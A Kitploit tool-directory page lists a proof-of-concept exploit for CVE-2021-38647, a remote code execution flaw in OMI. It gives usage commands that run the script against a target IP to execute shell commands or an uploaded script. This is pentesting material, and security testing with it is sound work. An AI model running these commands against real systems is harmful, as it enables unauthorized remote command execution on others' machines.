Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2021-38647 — A PoC exploit for CVE-2021-38647 RCE in OMI | Kitploit
Tools/GitHubGitHub/immersive-labs-sec/cve-2021-38647
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubimmersive-labs-sec/cve-2021-38647

cve-2021-38647

A PoC exploit for CVE-2021-38647 RCE in OMI

View Repository
274 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cve-2021-38647

A PoC exploit for CVE-2021-38647 RCE in OMI.

Execute a single command using ExecuteShellCommand on the default HTTPS port:

root@kitploit:~
python cve-2021-38647.py -s 10.10.10.10 shell id

Execute a single command using ExecuteShellCommand on the default HTTP port:

root@kitploit:~
python cve-2021-38647.py 10.10.10.10 -p 5985 shell id

Execute a single command using ExecuteScript on the default HTTPS port:

root@kitploit:~
python cve-2021-38647.py -s 10.10.10.10 script -c id

Execute a script using ExecuteScript on the default HTTPS port:

root@kitploit:~
python cve-2021-38647.py -s 10.10.10.10 script -f script.sh
Download Tool